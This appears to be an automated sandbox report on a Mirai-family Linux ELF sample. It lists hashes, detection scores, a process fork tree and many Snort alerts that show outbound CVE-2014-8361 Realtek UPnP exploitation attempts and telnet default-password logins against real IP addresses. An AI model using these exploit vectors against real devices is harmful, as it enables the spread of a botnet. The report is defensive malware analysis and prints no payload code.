Play interactive tour

Edit tour

Linux Analysis Report MePwVTNRoA

Overview

General Information

Sample Name:	MePwVTNRoA
Analysis ID:	513311
MD5:	9084c57fbabbee4ccef6bc105869d070
SHA1:	f0e374caec84c854f3462733c0d8222aad591620
SHA256:	514cfc468b96cb8732a5c04796b683b9c5dd957e050611a631ad747b6351b598
Tags:	32elfmiraipowerpc
Infos:

Detection

Mirai

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Connects to many ports of the same IP (likely port scanning)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	513311
Start date:	02.11.2021
Start time:	02:17:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 0s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	MePwVTNRoA
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal72.troj.lin@0/2@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

MePwVTNRoA (PID: 5238, Parent: 5118, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/MePwVTNRoA

MePwVTNRoA New Fork (PID: 5240, Parent: 5238)

MePwVTNRoA New Fork (PID: 5394, Parent: 5240)

MePwVTNRoA New Fork (PID: 5395, Parent: 5240)

MePwVTNRoA New Fork (PID: 5398, Parent: 5395)

MePwVTNRoA New Fork (PID: 5413, Parent: 5398)

MePwVTNRoA New Fork (PID: 5415, Parent: 5398)

MePwVTNRoA New Fork (PID: 5417, Parent: 5398)

MePwVTNRoA New Fork (PID: 5418, Parent: 5398)

MePwVTNRoA New Fork (PID: 5400, Parent: 5395)

MePwVTNRoA New Fork (PID: 5401, Parent: 5395)

MePwVTNRoA New Fork (PID: 5403, Parent: 5395)

MePwVTNRoA New Fork (PID: 5406, Parent: 5395)

MePwVTNRoA New Fork (PID: 5241, Parent: 5238)

MePwVTNRoA New Fork (PID: 5243, Parent: 5238)

MePwVTNRoA New Fork (PID: 5246, Parent: 5243)

MePwVTNRoA New Fork (PID: 5386, Parent: 5246)

MePwVTNRoA New Fork (PID: 5387, Parent: 5246)

MePwVTNRoA New Fork (PID: 5390, Parent: 5246)

MePwVTNRoA New Fork (PID: 5391, Parent: 5246)

MePwVTNRoA New Fork (PID: 5248, Parent: 5243)

MePwVTNRoA New Fork (PID: 5249, Parent: 5243)

MePwVTNRoA New Fork (PID: 5250, Parent: 5243)

MePwVTNRoA New Fork (PID: 5251, Parent: 5243)

systemd New Fork (PID: 5285, Parent: 1)

sshd (PID: 5285, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t

systemd New Fork (PID: 5286, Parent: 1)

sshd (PID: 5286, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D

cleanup

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: MePwVTNRoA	Virustotal: Detection: 51%			Perma Link
Source: MePwVTNRoA	ReversingLabs: Detection: 63%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49898 -> 45.123.199.185:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49898 -> 45.123.199.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48814 -> 91.208.8.69:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48814 -> 91.208.8.69:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48818 -> 91.208.8.69:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58308 -> 45.43.229.135:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58308 -> 45.43.229.135:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39622 -> 45.207.62.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39622 -> 45.207.62.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43624 -> 91.188.96.227:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43624 -> 91.188.96.227:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43626 -> 91.188.96.227:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37586 -> 45.207.62.91:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37586 -> 45.207.62.91:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38898 -> 91.78.6.176:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38898 -> 91.78.6.176:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38902 -> 91.78.6.176:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37590 -> 45.207.62.91:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33320 -> 91.121.57.103:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33320 -> 91.121.57.103:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33322 -> 91.121.57.103:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49054 -> 91.188.26.182:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33960 -> 185.248.138.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33960 -> 185.248.138.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33964 -> 185.248.138.198:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.181.82.104:23 -> 192.168.2.23:42704
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.181.82.104:23 -> 192.168.2.23:42704
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38634 -> 45.207.62.45:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38634 -> 45.207.62.45:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60944 -> 45.121.81.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60944 -> 45.121.81.178:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:43742
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51236 -> 45.158.21.135:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51236 -> 45.158.21.135:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:40624
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:40624
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43622 -> 45.195.156.199:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43622 -> 45.195.156.199:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48986 -> 91.77.129.255:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48986 -> 91.77.129.255:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48992 -> 91.77.129.255:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:40662
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:40662
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33000 -> 45.122.137.234:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33000 -> 45.122.137.234:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55288 -> 91.78.26.177:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55288 -> 91.78.26.177:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55292 -> 91.78.26.177:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:43832
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:40724
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:40724
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59518 -> 91.76.178.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59518 -> 91.76.178.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59522 -> 91.76.178.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47822 -> 45.121.57.201:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47822 -> 45.121.57.201:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47888 -> 45.123.198.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47888 -> 45.123.198.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55772 -> 45.43.237.29:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55772 -> 45.43.237.29:52869
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.136.37.106: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:43940
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37578 -> 45.120.111.141:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37578 -> 45.120.111.141:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42360 -> 185.245.0.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42360 -> 185.245.0.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37588 -> 45.120.111.141:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54488 -> 45.84.90.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54488 -> 45.84.90.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37892 -> 45.41.85.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37892 -> 45.41.85.8:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54496 -> 45.84.90.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42524 -> 45.84.89.189:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42524 -> 45.84.89.189:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42532 -> 45.84.89.189:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56230 -> 91.78.68.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56230 -> 91.78.68.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56242 -> 91.78.68.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42462 -> 45.43.239.199:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42462 -> 45.43.239.199:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41638 -> 45.115.236.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41638 -> 45.115.236.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36216 -> 45.195.14.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36216 -> 45.195.14.165:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:48740
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45200 -> 91.76.206.228:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45200 -> 91.76.206.228:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45216 -> 91.76.206.228:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46084 -> 45.120.207.251:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46084 -> 45.120.207.251:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:48740
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44036
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:48766
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36986 -> 45.43.236.80:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36986 -> 45.43.236.80:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59798 -> 91.76.229.184:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59798 -> 91.76.229.184:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42290 -> 185.147.58.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42290 -> 185.147.58.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59806 -> 91.76.229.184:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35880 -> 91.78.29.183:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35880 -> 91.78.29.183:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42298 -> 185.147.58.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35888 -> 91.78.29.183:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34272 -> 185.242.4.59:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34272 -> 185.242.4.59:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36212 -> 45.43.230.164:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36212 -> 45.43.230.164:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34290 -> 185.242.4.59:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:48766
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.52.149.6:23 -> 192.168.2.23:37510
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56142 -> 45.33.253.19:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56142 -> 45.33.253.19:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39974 -> 45.254.24.65:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39974 -> 45.254.24.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40462 -> 45.43.225.179:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40462 -> 45.43.225.179:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53182 -> 45.123.199.233:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53182 -> 45.123.199.233:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:48882
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44194
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 182.52.149.6:23 -> 192.168.2.23:37510
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:48882
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34322 -> 45.127.163.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34322 -> 45.127.163.252:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46198 -> 45.195.64.242:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46198 -> 45.195.64.242:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57290 -> 45.113.1.146:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57290 -> 45.113.1.146:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.52.149.6:23 -> 192.168.2.23:37634
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:48980
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48074 -> 45.121.59.111:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48074 -> 45.121.59.111:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40338 -> 91.77.229.231:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40338 -> 91.77.229.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40342 -> 91.77.229.231:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47812 -> 203.210.221.136:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 182.52.149.6:23 -> 192.168.2.23:37634
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:48980
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:43212 -> 14.181.82.104:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.181.82.104:23 -> 192.168.2.23:43212
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.181.82.104:23 -> 192.168.2.23:43212
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:41142
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:41142
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52634 -> 91.78.72.114:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52634 -> 91.78.72.114:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52638 -> 91.78.72.114:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:47812
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:47812
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44292
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:49018
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:41190
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:41190
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:49018
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:49046
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:41214
